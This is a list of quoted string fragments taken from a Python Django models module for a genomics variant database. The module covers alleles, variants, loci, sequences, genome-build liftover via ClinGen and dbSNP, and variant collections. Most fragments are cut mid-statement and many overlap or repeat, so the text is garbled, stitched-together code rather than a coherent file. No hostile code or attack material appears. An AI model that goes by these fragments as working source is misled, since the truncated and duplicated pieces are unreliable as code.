"def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)}",
"ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig",
"def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas",
"get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\"",
"does not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38",
"\"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else:",
":= self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all",
"def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and variant.start",
"def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via",
"@staticmethod def abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s",
"class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38 variants",
"is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def",
"def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) #",
"= models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return",
"is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def",
"@receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles =",
"get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build)",
"= models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover",
"django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers",
"through a VCF where ID is set to Allele.pk and then creating VariantAllele",
"return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE)",
"\"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is",
"pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def",
"= DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple",
"def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property",
"params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self)",
"return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs =",
"on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\",",
"-> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant",
"ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt",
"(once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self):",
"is to use Gist indexes but that requires installing the btree_gist extension (requires",
"can write the VCF in the desired genome build For others (NCBI Remap)",
"pointing to the same locus for the row) There is only 1 Variant",
"@lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc",
"success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt')",
"Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele",
"genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) ->",
"self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can :=",
"str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def",
"flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics",
"to the same locus) There is only 1 Locus for a given chrom/position/ref",
"genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple",
"VCF in the desired genome build For others (NCBI Remap) we need to",
"VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover",
"if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37,",
"\"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self,",
"return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild)",
"Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) ->",
"-> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self)",
"'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self,",
"@property def is_reference(self) -> bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) ->",
"@property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name =",
"alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr)",
"import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import settings from",
"ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return",
"= (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN",
"@staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\",",
"locus.ref should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return",
"get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs = set(c.pk",
"1 per line in a VCF file (multiple Variants with different alt alleles",
"error = models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\",",
"else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs):",
"GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover.",
"F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def",
"the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in",
"genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to",
"va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) ->",
"| Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome",
"genome build For others (NCBI Remap) we need to write the source genome",
"can add that unique_together constraint We only expect to store Alleles for a",
"a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele,",
"q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"):",
"Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq !=",
"VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant,",
"models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not",
"import logging import re from typing import Optional, Pattern, Tuple, Iterable, Set import",
"alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele",
"and not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id} for",
"def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert,",
"return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source",
"None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names",
"any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta",
"models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination",
"\"\"\" 1 per line in a VCF file (multiple Variants with different alt",
"re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent -",
"\"\"\" Merge other_allele into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt",
"self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int",
"in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource,",
"import get_hgvs_variant_tuple # Check if the other build shares existing contig genome_build_contigs =",
"old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2,",
"itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele",
"= (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position}",
"can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele,",
"from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom",
"@lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None",
"class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a cached",
"ValueError: # Various contig errors all subclass from this pass if g_hgvs is",
"-> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq",
"= f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self,",
"self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return",
"class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom)",
"def get_absolute_url(self): # will show allele if there is one, otherwise go to",
"-> AlleleSource: \"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet:",
"Used by to write VCF coordinates during liftover. Can be slow (API call)",
"liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return",
"via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source",
"source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return",
"it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele",
"conversion_tool = None g_hgvs = None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool",
"VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns (chrom,",
"ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def",
"of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property",
"dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP",
"{genome_build}') if not va: va = vas.first() if va: return va.variant raise ValueError(f'Could",
"ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str,",
"allele {self.id} for build {genome_build}') if not va: va = vas.first() if va:",
"contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta:",
"= dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple =",
"all builds, but at least one # links there, and can't have another,",
"VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build,",
"GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple)))",
"ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if",
"a VCF file (ref + >= 1 alts pointing to the same locus",
"django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy",
"ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple =",
"\"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class",
"import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig, GenomeBuild,",
"choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error",
"of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele,",
"self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None",
"Alleles must have already been created - allele_source used to retrieve them The",
"ID is set to Allele.pk and then creating VariantAllele entries for the variant/allele",
"m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig =",
"in those cases # we'll have the same variant linked through different VariantAlleles",
"django.db.models import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from",
"genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple:",
"@property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length",
"models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return",
"a source of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self):",
"TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection,",
"= re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent",
":= regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt =",
"Iterable, Set import django.dispatch from django.conf import settings from django.contrib.auth.models import User from",
"creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can",
"if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return",
"class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant,",
"return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self):",
"def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele := self.clingen_allele): return",
"locus) There is only 1 Locus for a given chrom/position/ref per database (handled",
"= models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF",
"if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None:",
"variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from",
"Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import",
"\"\"\" Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs()",
"return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple =",
"the same locus) There is only 1 Locus for a given chrom/position/ref per",
"genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build:",
"allele if there is one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\":",
"Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return",
"other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names =",
"the other build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values())",
"done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build",
"Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def",
"build to resolve to the same allele (due to our normalization not being",
"({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele",
"if not va and not best_attempt: raise ValueError(f'Could not find a variant in",
"def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first():",
"other_allele into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge",
"variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into this",
"to retrieve them The VCF (in genome_build build) is set in UploadedFile for",
"\"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod",
"models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model):",
"self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va and",
"from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition",
"represent the different alleles at a locus Usually 2+ per line in a",
"= models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error =",
"on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\" return",
"from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares existing contig",
"allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property",
"[self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav,",
"works if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs,",
"{self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover,",
"models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property",
"vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS:",
"add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length =",
"def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles",
"__str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name",
"to md5sum seq and make the constraint on that. Another possible solution is",
"\"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt =",
"def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\"",
"into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message",
"\"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def",
"DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple =",
"best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(),",
"models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together =",
"name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query \"\"\"",
"on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but",
"btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has",
"line in a VCF file (multiple Variants with different alt alleles point to",
"Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\"",
"= {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs)",
"import Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields",
"variants from the same genome build to resolve to the same allele (due",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass",
"str, max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return",
"point to same allele This is generally done via ClinGen Allele Registry, but",
"variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele') def",
"cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position",
"existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele = self",
"= models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition =",
"is 8191\" The easiest solution is to md5sum seq and make the constraint",
"end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\")",
"standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and",
"import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch",
"GRCh37/38 share MT and some unplaced scaffolds) - in those cases # we'll",
"from lazy import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal,",
"ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom,",
"chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\"",
"= VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns",
"import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from django.urls.base",
"source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to",
"(in genome_build build) is set in UploadedFile for the UploadPipeline \"\"\" user =",
"used to retrieve them The VCF (in genome_build build) is set in UploadedFile",
"def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele:",
"a locus Usually 2+ per line in a VCF file (ref + >=",
"GenomeBuild): \"\"\" This is called at the end of a liftover pipeline (once",
"return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError:",
